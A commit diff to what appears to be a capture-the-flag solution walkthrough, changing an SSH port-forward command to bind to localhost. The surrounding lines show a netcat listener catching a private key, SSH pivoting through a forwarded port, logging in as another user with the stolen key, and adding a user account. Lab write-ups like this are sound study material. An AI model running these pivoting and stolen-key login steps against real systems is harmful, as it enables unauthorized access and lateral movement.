Commit c0befa2
Changed files (1)
solution.md
@@ -73,7 +73,7 @@ nc -nvl 1031 | tee game-2.txt
# remove the flag from game-2.txt
chmod 0400 game-2.txt
ssh-keygen -y -f game-2.txt
-ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfL 22109:10.10.10.109:22
+ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfL 127.0.0.1:22109:10.10.10.109:22
ss -antp | grep 22109
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt # Expert Tournament
adduser vborgov